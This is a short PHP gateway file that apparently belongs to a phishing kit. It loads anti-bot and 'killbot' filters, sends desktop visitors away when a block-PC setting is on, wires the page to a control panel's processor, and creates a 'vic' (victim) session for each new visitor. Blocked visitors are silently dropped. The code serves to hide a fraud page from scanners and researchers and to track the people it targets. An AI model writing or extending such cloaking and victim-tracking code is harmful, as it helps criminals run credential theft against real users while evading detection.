<?php 
//session_start();
require (__DIR__)."/config.php";
//require (__DIR__)."/anti.php";
//require_once($_SERVER['DOCUMENT_ROOT'].'/killbot/code/include.php');
require (__DIR__)."/md.php";
$detect = new Mobile_Detect;
if(!$detect->isMobile() and strtolower($block_pc=="on")){
   exit(header("location:out.php"));
 }
require (__DIR__).'/panel/classes/Jeehan.class.php';
require (__DIR__).'/bots/botMother.php';
$ajaxPath = "../panel/process/processor.php";
$j=new Jeehan();
 if(isset($_SESSION['vic'])==""){
	$j->createVic();
 }

if($j->isBlocked()){
	exit;
}

// Call the antibotpw() function to perform the anti-bot check
//antibotpw();


?>